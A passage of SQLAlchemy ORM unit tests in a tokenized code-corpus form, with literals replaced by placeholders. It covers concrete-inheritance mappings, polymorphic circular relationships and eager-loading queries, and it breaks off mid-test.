ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> employee_id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> class Manager ( Employee ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> employee_id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> golf_swing = Column ( String ( <NUM_LIT> ) ) <EOL> __mapper_args__ = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> class Boss ( Manager ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> employee_id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> golf_swing = Column ( String ( <NUM_LIT> ) ) <EOL> __mapper_args__ = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> class Engineer ( Employee ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> employee_id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> primary_language = Column ( String ( <NUM_LIT> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> self . 
_roundtrip ( Employee , Manager , Engineer , Boss ) <EOL> def test_has_inherited_table_doesnt_consider_base ( self ) : <EOL> class A ( Base ) : <EOL> __tablename__ = '<STR_LIT:a>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> assert not has_inherited_table ( A ) <EOL> class B ( A ) : <EOL> __tablename__ = '<STR_LIT:b>' <EOL> id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) <EOL> assert has_inherited_table ( B ) <EOL> def test_has_inherited_table_in_mapper_args ( self ) : <EOL> class Test ( Base ) : <EOL> __tablename__ = '<STR_LIT:test>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> type = Column ( String ( <NUM_LIT:20> ) ) <EOL> @ declared_attr <EOL> def __mapper_args__ ( cls ) : <EOL> if not has_inherited_table ( cls ) : <EOL> ret = { <EOL> '<STR_LIT>' : '<STR_LIT:default>' , <EOL> '<STR_LIT>' : cls . type , <EOL> } <EOL> else : <EOL> ret = { '<STR_LIT>' : cls . __name__ } <EOL> return ret <EOL> class PolyTest ( Test ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , ForeignKey ( Test . id ) , primary_key = True ) <EOL> configure_mappers ( ) <EOL> assert Test . __mapper__ . polymorphic_on is Test . __table__ . c . type <EOL> assert PolyTest . __mapper__ . polymorphic_on is Test . __table__ . c . type <EOL> def test_ok_to_override_type_from_abstract ( self ) : <EOL> class Employee ( AbstractConcreteBase , Base , fixtures . 
ComparableEntity ) : <EOL> pass <EOL> class Manager ( Employee ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> employee_id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> golf_swing = Column ( String ( <NUM_LIT> ) ) <EOL> @ property <EOL> def type ( self ) : <EOL> return "<STR_LIT>" <EOL> __mapper_args__ = { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : True } <EOL> class Boss ( Manager ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> employee_id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> golf_swing = Column ( String ( <NUM_LIT> ) ) <EOL> @ property <EOL> def type ( self ) : <EOL> return "<STR_LIT>" <EOL> __mapper_args__ = { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : True } <EOL> class Engineer ( Employee ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> employee_id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> primary_language = Column ( String ( <NUM_LIT> ) ) <EOL> @ property <EOL> def type ( self ) : <EOL> return "<STR_LIT>" <EOL> __mapper_args__ = { '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : True } <EOL> self . _roundtrip ( Employee , Manager , Engineer , Boss , explicit_type = True ) <EOL> class ConcreteExtensionConfigTest ( <EOL> _RemoveListeners , testing . AssertsCompiledSQL , DeclarativeTestBase ) : <EOL> __dialect__ = '<STR_LIT:default>' <EOL> def test_classreg_setup ( self ) : <EOL> class A ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT:a>' <EOL> id = Column ( Integer , <EOL> primary_key = True , test_needs_autoincrement = True ) <EOL> data = Column ( String ( <NUM_LIT:50> ) ) <EOL> collection = relationship ( "<STR_LIT>" , primaryjoin = "<STR_LIT>" , <EOL> collection_class = set ) <EOL> class BC ( AbstractConcreteBase , Base , fixtures . 
ComparableEntity ) : <EOL> pass <EOL> class B ( BC ) : <EOL> __tablename__ = '<STR_LIT:b>' <EOL> id = Column ( Integer , <EOL> primary_key = True , test_needs_autoincrement = True ) <EOL> a_id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> data = Column ( String ( <NUM_LIT:50> ) ) <EOL> b_data = Column ( String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { <EOL> "<STR_LIT>" : "<STR_LIT:b>" , <EOL> "<STR_LIT>" : True <EOL> } <EOL> class C ( BC ) : <EOL> __tablename__ = '<STR_LIT:c>' <EOL> id = Column ( Integer , <EOL> primary_key = True , test_needs_autoincrement = True ) <EOL> a_id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> data = Column ( String ( <NUM_LIT:50> ) ) <EOL> c_data = Column ( String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { <EOL> "<STR_LIT>" : "<STR_LIT:c>" , <EOL> "<STR_LIT>" : True <EOL> } <EOL> Base . metadata . create_all ( ) <EOL> sess = Session ( ) <EOL> sess . add_all ( [ <EOL> A ( data = '<STR_LIT>' , collection = set ( [ <EOL> B ( data = '<STR_LIT>' , b_data = '<STR_LIT>' ) , <EOL> C ( data = '<STR_LIT>' , c_data = '<STR_LIT>' ) , <EOL> B ( data = '<STR_LIT>' , b_data = '<STR_LIT>' ) , <EOL> C ( data = '<STR_LIT>' , c_data = '<STR_LIT>' ) , <EOL> ] ) ) , <EOL> A ( data = '<STR_LIT>' , collection = set ( [ <EOL> B ( data = '<STR_LIT>' , b_data = '<STR_LIT>' ) , <EOL> C ( data = '<STR_LIT>' , c_data = '<STR_LIT>' ) , <EOL> B ( data = '<STR_LIT>' , b_data = '<STR_LIT>' ) , <EOL> C ( data = '<STR_LIT>' , c_data = '<STR_LIT>' ) , <EOL> ] ) ) <EOL> ] ) <EOL> sess . commit ( ) <EOL> sess . expunge_all ( ) <EOL> eq_ ( <EOL> sess . query ( A ) . filter_by ( data = '<STR_LIT>' ) . all ( ) , <EOL> [ <EOL> A ( data = '<STR_LIT>' , collection = set ( [ <EOL> B ( data = '<STR_LIT>' , b_data = '<STR_LIT>' ) , <EOL> B ( data = '<STR_LIT>' , b_data = '<STR_LIT>' ) , <EOL> C ( data = '<STR_LIT>' , c_data = '<STR_LIT>' ) , <EOL> C ( data = '<STR_LIT>' , c_data = '<STR_LIT>' ) , <EOL> ] ) ) <EOL> ] <EOL> ) <EOL> self . 
assert_compile ( <EOL> sess . query ( A ) . join ( A . collection ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_prop_on_base ( self ) : <EOL> """<STR_LIT>""" <EOL> counter = mock . Mock ( ) <EOL> class Something ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> class AbstractConcreteAbstraction ( AbstractConcreteBase , Base ) : <EOL> id = Column ( Integer , primary_key = True ) <EOL> x = Column ( Integer ) <EOL> y = Column ( Integer ) <EOL> @ declared_attr <EOL> def something_id ( cls ) : <EOL> return Column ( ForeignKey ( Something . id ) ) <EOL> @ declared_attr <EOL> def something ( cls ) : <EOL> counter ( cls , "<STR_LIT>" ) <EOL> return relationship ( "<STR_LIT>" ) <EOL> @ declared_attr <EOL> def something_else ( cls ) : <EOL> counter ( cls , "<STR_LIT>" ) <EOL> return relationship ( "<STR_LIT>" ) <EOL> class ConcreteConcreteAbstraction ( AbstractConcreteAbstraction ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> assert ConcreteConcreteAbstraction . __mapper__ <EOL> assert not hasattr ( AbstractConcreteAbstraction , '<STR_LIT>' ) <EOL> session = Session ( ) <EOL> self . assert_compile ( <EOL> session . query ( ConcreteConcreteAbstraction ) . filter ( <EOL> ConcreteConcreteAbstraction . something . has ( id = <NUM_LIT:1> ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> assert AbstractConcreteAbstraction . __mapper__ <EOL> self . assert_compile ( <EOL> session . query ( ConcreteConcreteAbstraction ) . filter ( <EOL> ConcreteConcreteAbstraction . something_else . has ( id = <NUM_LIT:1> ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . assert_compile ( <EOL> session . query ( AbstractConcreteAbstraction ) . 
filter ( <EOL> AbstractConcreteAbstraction . something . has ( id = <NUM_LIT:1> ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . assert_compile ( <EOL> session . query ( AbstractConcreteAbstraction ) . filter ( <EOL> AbstractConcreteAbstraction . something_else . has ( id = <NUM_LIT:1> ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_abstract_in_hierarchy ( self ) : <EOL> class Document ( Base , AbstractConcreteBase ) : <EOL> doctype = Column ( String ) <EOL> class ContactDocument ( Document ) : <EOL> __abstract__ = True <EOL> send_method = Column ( String ) <EOL> class ActualDocument ( ContactDocument ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> id = Column ( Integer , primary_key = True ) <EOL> configure_mappers ( ) <EOL> session = Session ( ) <EOL> self . assert_compile ( <EOL> session . query ( Document ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_column_attr_names ( self ) : <EOL> """<STR_LIT>""" <EOL> class Document ( Base , AbstractConcreteBase ) : <EOL> documentType = Column ( '<STR_LIT>' , String ) <EOL> class Offer ( Document ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> __mapper_args__ = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> configure_mappers ( ) <EOL> session = Session ( ) <EOL> self . assert_compile ( <EOL> session . query ( Document ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . assert_compile ( <EOL> session . query ( Document . documentType ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) </s>
<s> from sqlalchemy import * <EOL> from sqlalchemy . orm import * <EOL> from sqlalchemy . testing import fixtures <EOL> from sqlalchemy import testing <EOL> from sqlalchemy . testing . schema import Table , Column <EOL> class PolymorphicCircularTest ( fixtures . MappedTest ) : <EOL> run_setup_mappers = '<STR_LIT>' <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> global Table1 , Table1B , Table2 , Table3 , Data <EOL> table1 = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True , test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) , nullable = True ) , <EOL> Column ( '<STR_LIT:type>' , String ( <NUM_LIT:30> ) ) , <EOL> Column ( '<STR_LIT:name>' , String ( <NUM_LIT:30> ) ) <EOL> ) <EOL> table2 = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) , <EOL> ) <EOL> table3 = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) , <EOL> ) <EOL> data = Table ( '<STR_LIT:data>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True , test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:data>' , String ( <NUM_LIT:30> ) ) <EOL> ) <EOL> join = table1 . outerjoin ( table2 ) . outerjoin ( table3 ) . alias ( '<STR_LIT>' ) <EOL> class Table1 ( object ) : <EOL> def __init__ ( self , name , data = None ) : <EOL> self . name = name <EOL> if data is not None : <EOL> self . data = data <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , self . id , repr ( str ( self . name ) ) , repr ( self . 
data ) ) <EOL> class Table1B ( Table1 ) : <EOL> pass <EOL> class Table2 ( Table1 ) : <EOL> pass <EOL> class Table3 ( Table1 ) : <EOL> pass <EOL> class Data ( object ) : <EOL> def __init__ ( self , data ) : <EOL> self . data = data <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , self . id , repr ( str ( self . data ) ) ) <EOL> try : <EOL> table1_mapper = mapper ( Table1 , table1 , <EOL> select_table = join , <EOL> polymorphic_on = table1 . c . type , <EOL> polymorphic_identity = '<STR_LIT>' , <EOL> properties = { <EOL> '<STR_LIT>' : relationship ( Table1 , <EOL> backref = backref ( '<STR_LIT>' , foreignkey = join . c . id , uselist = False ) , <EOL> uselist = False , primaryjoin = join . c . id == join . c . related_id ) , <EOL> '<STR_LIT:data>' : relationship ( mapper ( Data , data ) ) <EOL> } ) <EOL> configure_mappers ( ) <EOL> assert False <EOL> except : <EOL> assert True <EOL> clear_mappers ( ) <EOL> table1_mapper = mapper ( Table1 , table1 , <EOL> polymorphic_on = table1 . c . type , <EOL> polymorphic_identity = '<STR_LIT>' , <EOL> properties = { <EOL> '<STR_LIT>' : relationship ( Table1 , <EOL> backref = backref ( '<STR_LIT>' , remote_side = table1 . c . id , uselist = False ) , <EOL> uselist = False , primaryjoin = table1 . c . id == table1 . c . related_id ) , <EOL> '<STR_LIT:data>' : relationship ( mapper ( Data , data ) , lazy = '<STR_LIT>' , order_by = data . c . id ) <EOL> } <EOL> ) <EOL> table1b_mapper = mapper ( Table1B , inherits = table1_mapper , polymorphic_identity = '<STR_LIT>' ) <EOL> table2_mapper = mapper ( Table2 , table2 , <EOL> inherits = table1_mapper , <EOL> polymorphic_identity = '<STR_LIT>' ) <EOL> table3_mapper = mapper ( Table3 , table3 , inherits = table1_mapper , polymorphic_identity = '<STR_LIT>' ) <EOL> configure_mappers ( ) <EOL> assert table1_mapper . primary_key == ( table1 . c . id , ) , table1_mapper . primary_key <EOL> def test_one ( self ) : <EOL> self . 
_testlist ( [ Table1 , Table2 , Table1 , Table2 ] ) <EOL> def test_two ( self ) : <EOL> self . _testlist ( [ Table3 ] ) <EOL> def test_three ( self ) : <EOL> self . _testlist ( [ Table2 , Table1 , Table1B , Table3 , Table3 , Table1B , Table1B , Table2 , Table1 ] ) <EOL> def test_four ( self ) : <EOL> self . _testlist ( [ <EOL> Table2 ( '<STR_LIT>' , [ Data ( '<STR_LIT>' ) , Data ( '<STR_LIT>' ) ] ) , <EOL> Table1 ( '<STR_LIT>' , [ ] ) , <EOL> Table3 ( '<STR_LIT>' , [ Data ( '<STR_LIT>' ) ] ) , <EOL> Table1B ( '<STR_LIT>' , [ Data ( '<STR_LIT>' ) , Data ( '<STR_LIT>' ) ] ) <EOL> ] ) <EOL> def _testlist ( self , classes ) : <EOL> sess = create_session ( ) <EOL> count = <NUM_LIT:1> <EOL> obj = None <EOL> for c in classes : <EOL> if isinstance ( c , type ) : <EOL> newobj = c ( '<STR_LIT>' % count ) <EOL> count += <NUM_LIT:1> <EOL> else : <EOL> newobj = c <EOL> if obj is not None : <EOL> obj . nxt = newobj <EOL> else : <EOL> t = newobj <EOL> obj = newobj <EOL> sess . add ( t ) <EOL> sess . flush ( ) <EOL> assertlist = [ ] <EOL> node = t <EOL> while ( node ) : <EOL> assertlist . append ( node ) <EOL> n = node . nxt <EOL> if n is not None : <EOL> assert n . prev is node <EOL> node = n <EOL> original = repr ( assertlist ) <EOL> sess . expunge_all ( ) <EOL> node = sess . query ( Table1 ) . order_by ( Table1 . id ) . filter ( Table1 . id == t . id ) . first ( ) <EOL> assertlist = [ ] <EOL> while ( node ) : <EOL> assertlist . append ( node ) <EOL> n = node . nxt <EOL> if n is not None : <EOL> assert n . prev is node <EOL> node = n <EOL> forwards = repr ( assertlist ) <EOL> sess . expunge_all ( ) <EOL> node = sess . query ( Table1 ) . order_by ( Table1 . id ) . filter ( Table1 . id == obj . id ) . first ( ) <EOL> assertlist = [ ] <EOL> while ( node ) : <EOL> assertlist . insert ( <NUM_LIT:0> , node ) <EOL> n = node . prev <EOL> if n is not None : <EOL> assert n . nxt is node <EOL> node = n <EOL> backwards = repr ( assertlist ) <EOL> assert original == forwards == backwards </s>
<s> """<STR_LIT>""" <EOL> from sqlalchemy . testing import eq_ , is_ , is_not_ , in_ <EOL> import sqlalchemy as sa <EOL> from sqlalchemy import testing <EOL> from sqlalchemy . orm import joinedload , deferred , undefer , joinedload_all , backref , Session , defaultload , Load , load_only , contains_eager <EOL> from sqlalchemy import Integer , String , Date , ForeignKey , and_ , select , func , text <EOL> from sqlalchemy . testing . schema import Table , Column <EOL> from sqlalchemy . orm import mapper , relationship , create_session , lazyload , aliased , column_property <EOL> from sqlalchemy . sql import operators <EOL> from sqlalchemy . testing import assert_raises , assert_raises_message <EOL> from sqlalchemy . testing . assertsql import CompiledSQL <EOL> from sqlalchemy . testing import fixtures , expect_warnings <EOL> from test . orm import _fixtures <EOL> from sqlalchemy . util import OrderedDict as odict <EOL> import datetime <EOL> class EagerTest ( _fixtures . FixtureTest , testing . AssertsCompiledSQL ) : <EOL> run_inserts = '<STR_LIT>' <EOL> run_deletes = None <EOL> __dialect__ = '<STR_LIT:default>' <EOL> def test_basic ( self ) : <EOL> users , Address , addresses , User = ( <EOL> self . tables . users , <EOL> self . classes . Address , <EOL> self . tables . addresses , <EOL> self . classes . User ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> mapper ( Address , addresses ) , lazy = '<STR_LIT>' , order_by = Address . id ) <EOL> } ) <EOL> sess = create_session ( ) <EOL> q = sess . query ( User ) <EOL> eq_ ( [ User ( id = <NUM_LIT:7> , addresses = [ <EOL> Address ( id = <NUM_LIT:1> , email_address = '<STR_LIT>' ) ] ) ] , <EOL> q . filter ( User . id == <NUM_LIT:7> ) . all ( ) ) <EOL> eq_ ( self . static . user_address_result , q . order_by ( User . id ) . all ( ) ) <EOL> def test_late_compile ( self ) : <EOL> User , Address , addresses , users = ( <EOL> self . classes . User , <EOL> self . classes . 
Address , <EOL> self . tables . addresses , <EOL> self . tables . users ) <EOL> m = mapper ( User , users ) <EOL> sess = create_session ( ) <EOL> sess . query ( User ) . all ( ) <EOL> m . add_property ( "<STR_LIT>" , relationship ( mapper ( Address , addresses ) ) ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> [ User ( id = <NUM_LIT:7> , addresses = [ <EOL> Address ( id = <NUM_LIT:1> , email_address = '<STR_LIT>' ) ] ) ] , <EOL> sess . query ( User ) . options ( <EOL> joinedload ( '<STR_LIT>' ) ) . filter ( User . id == <NUM_LIT:7> ) . all ( ) <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_no_orphan ( self ) : <EOL> """<STR_LIT>""" <EOL> users , Address , addresses , User = ( <EOL> self . tables . users , <EOL> self . classes . Address , <EOL> self . tables . addresses , <EOL> self . classes . User ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> Address , cascade = "<STR_LIT>" , lazy = '<STR_LIT>' ) <EOL> } ) <EOL> mapper ( Address , addresses ) <EOL> sess = create_session ( ) <EOL> user = sess . query ( User ) . get ( <NUM_LIT:7> ) <EOL> assert getattr ( User , '<STR_LIT>' ) . hasparent ( <EOL> sa . orm . attributes . instance_state ( <EOL> user . addresses [ <NUM_LIT:0> ] ) , optimistic = True ) <EOL> assert not sa . orm . class_mapper ( Address ) . _is_orphan ( <EOL> sa . orm . attributes . instance_state ( user . addresses [ <NUM_LIT:0> ] ) ) <EOL> def test_orderby ( self ) : <EOL> users , Address , addresses , User = ( <EOL> self . tables . users , <EOL> self . classes . Address , <EOL> self . tables . addresses , <EOL> self . classes . User ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> mapper ( Address , addresses ) , <EOL> lazy = '<STR_LIT>' , order_by = addresses . c . email_address ) , <EOL> } ) <EOL> q = create_session ( ) . 
query ( User ) <EOL> eq_ ( [ <EOL> User ( id = <NUM_LIT:7> , addresses = [ <EOL> Address ( id = <NUM_LIT:1> ) <EOL> ] ) , <EOL> User ( id = <NUM_LIT:8> , addresses = [ <EOL> Address ( id = <NUM_LIT:3> , email_address = '<STR_LIT>' ) , <EOL> Address ( id = <NUM_LIT:4> , email_address = '<STR_LIT>' ) , <EOL> Address ( id = <NUM_LIT:2> , email_address = '<STR_LIT>' ) <EOL> ] ) , <EOL> User ( id = <NUM_LIT:9> , addresses = [ <EOL> Address ( id = <NUM_LIT:5> ) <EOL> ] ) , <EOL> User ( id = <NUM_LIT:10> , addresses = [ ] ) <EOL> ] , q . order_by ( User . id ) . all ( ) ) <EOL> def test_orderby_multi ( self ) : <EOL> users , Address , addresses , User = ( <EOL> self . tables . users , <EOL> self . classes . Address , <EOL> self . tables . addresses , <EOL> self . classes . User ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> mapper ( Address , addresses ) , <EOL> lazy = '<STR_LIT>' , <EOL> order_by = [ addresses . c . email_address , addresses . c . id ] ) , <EOL> } ) <EOL> q = create_session ( ) . query ( User ) <EOL> eq_ ( [ <EOL> User ( id = <NUM_LIT:7> , addresses = [ <EOL> Address ( id = <NUM_LIT:1> ) <EOL> ] ) , <EOL> User ( id = <NUM_LIT:8> , addresses = [ <EOL> Address ( id = <NUM_LIT:3> , email_address = '<STR_LIT>' ) , <EOL> Address ( id = <NUM_LIT:4> , email_address = '<STR_LIT>' ) , <EOL> Address ( id = <NUM_LIT:2> , email_address = '<STR_LIT>' ) <EOL> ] ) , <EOL> User ( id = <NUM_LIT:9> , addresses = [ <EOL> Address ( id = <NUM_LIT:5> ) <EOL> ] ) , <EOL> User ( id = <NUM_LIT:10> , addresses = [ ] ) <EOL> ] , q . order_by ( User . id ) . all ( ) ) <EOL> def test_orderby_related ( self ) : <EOL> """<STR_LIT>""" <EOL> Address , addresses , users , User = ( self . classes . Address , <EOL> self . tables . addresses , <EOL> self . tables . users , <EOL> self . classes . 
User ) <EOL> mapper ( Address , addresses ) <EOL> mapper ( User , users , properties = dict ( <EOL> addresses = relationship ( <EOL> Address , lazy = '<STR_LIT>' , order_by = addresses . c . id ) , <EOL> ) ) <EOL> q = create_session ( ) . query ( User ) <EOL> l = q . filter ( User . id == Address . user_id ) . order_by ( <EOL> Address . email_address ) . all ( ) <EOL> eq_ ( [ <EOL> User ( id = <NUM_LIT:8> , addresses = [ <EOL> Address ( id = <NUM_LIT:2> , email_address = '<STR_LIT>' ) , <EOL> Address ( id = <NUM_LIT:3> , email_address = '<STR_LIT>' ) , <EOL> Address ( id = <NUM_LIT:4> , email_address = '<STR_LIT>' ) , <EOL> ] ) , <EOL> User ( id = <NUM_LIT:9> , addresses = [ <EOL> Address ( id = <NUM_LIT:5> ) <EOL> ] ) , <EOL> User ( id = <NUM_LIT:7> , addresses = [ <EOL> Address ( id = <NUM_LIT:1> ) <EOL> ] ) , <EOL> ] , l ) <EOL> def test_orderby_desc ( self ) : <EOL> Address , addresses , users , User = ( self . classes . Address , <EOL> self . tables . addresses , <EOL> self . tables . users , <EOL> self . classes . User ) <EOL> mapper ( Address , addresses ) <EOL> mapper ( User , users , properties = dict ( <EOL> addresses = relationship ( <EOL> Address , lazy = '<STR_LIT>' , <EOL> order_by = [ sa . desc ( addresses . c . email_address ) ] ) , <EOL> ) ) <EOL> sess = create_session ( ) <EOL> eq_ ( [ <EOL> User ( id = <NUM_LIT:7> , addresses = [ <EOL> Address ( id = <NUM_LIT:1> ) <EOL> ] ) , <EOL> User ( id = <NUM_LIT:8> , addresses = [ <EOL> Address ( id = <NUM_LIT:2> , email_address = '<STR_LIT>' ) , <EOL> Address ( id = <NUM_LIT:4> , email_address = '<STR_LIT>' ) , <EOL> Address ( id = <NUM_LIT:3> , email_address = '<STR_LIT>' ) , <EOL> ] ) , <EOL> User ( id = <NUM_LIT:9> , addresses = [ <EOL> Address ( id = <NUM_LIT:5> ) <EOL> ] ) , <EOL> User ( id = <NUM_LIT:10> , addresses = [ ] ) <EOL> ] , sess . query ( User ) . order_by ( User . id ) . 
all ( ) ) <EOL> def test_no_ad_hoc_orderby ( self ) : <EOL> """<STR_LIT>""" <EOL> Address , addresses , users , User = ( self . classes . Address , <EOL> self . tables . addresses , <EOL> self . tables . users , <EOL> self . classes . User ) <EOL> mapper ( Address , addresses ) <EOL> mapper ( User , users , properties = dict ( <EOL> addresses = relationship ( <EOL> Address ) , <EOL> ) ) <EOL> sess = create_session ( ) <EOL> q = sess . query ( User ) . join ( "<STR_LIT>" ) . options ( joinedload ( "<STR_LIT>" ) ) . order_by ( "<STR_LIT>" ) <EOL> self . assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> q = sess . query ( User ) . options ( joinedload ( "<STR_LIT>" ) ) . order_by ( "<STR_LIT>" ) <EOL> with expect_warnings ( "<STR_LIT>" ) : <EOL> self . assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_deferred_fk_col ( self ) : <EOL> users , Dingaling , User , dingalings , Address , addresses = ( <EOL> self . tables . users , <EOL> self . classes . Dingaling , <EOL> self . classes . User , <EOL> self . tables . dingalings , <EOL> self . classes . Address , <EOL> self . tables . addresses ) <EOL> mapper ( Address , addresses , properties = { <EOL> '<STR_LIT>' : deferred ( addresses . c . user_id ) , <EOL> '<STR_LIT:user>' : relationship ( User , lazy = '<STR_LIT>' ) <EOL> } ) <EOL> mapper ( User , users ) <EOL> sess = create_session ( ) <EOL> for q in [ <EOL> sess . query ( Address ) . filter ( <EOL> Address . id . in_ ( [ <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:5> ] ) <EOL> ) . order_by ( Address . id ) , <EOL> sess . query ( Address ) . filter ( <EOL> Address . id . in_ ( [ <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:5> ] ) <EOL> ) . order_by ( Address . id ) . limit ( <NUM_LIT:3> ) <EOL> ] : <EOL> sess . expunge_all ( ) <EOL> eq_ ( q . 
all ( ) , <EOL> [ Address ( id = <NUM_LIT:1> , user = User ( id = <NUM_LIT:7> ) ) , <EOL> Address ( id = <NUM_LIT:4> , user = User ( id = <NUM_LIT:8> ) ) , <EOL> Address ( id = <NUM_LIT:5> , user = User ( id = <NUM_LIT:9> ) ) ] <EOL> ) <EOL> sess . expunge_all ( ) <EOL> a = sess . query ( Address ) . filter ( Address . id == <NUM_LIT:1> ) . all ( ) [ <NUM_LIT:0> ] <EOL> def go ( ) : <EOL> eq_ ( a . user_id , <NUM_LIT:7> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> sess . expunge_all ( ) <EOL> a = sess . query ( Address ) . filter ( Address . id == <NUM_LIT:1> ) . first ( ) <EOL> def go ( ) : <EOL> eq_ ( a . user_id , <NUM_LIT:7> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> sa . orm . clear_mappers ( ) <EOL> mapper ( Address , addresses , properties = { <EOL> '<STR_LIT>' : deferred ( addresses . c . user_id ) , <EOL> } ) <EOL> mapper ( User , users , properties = 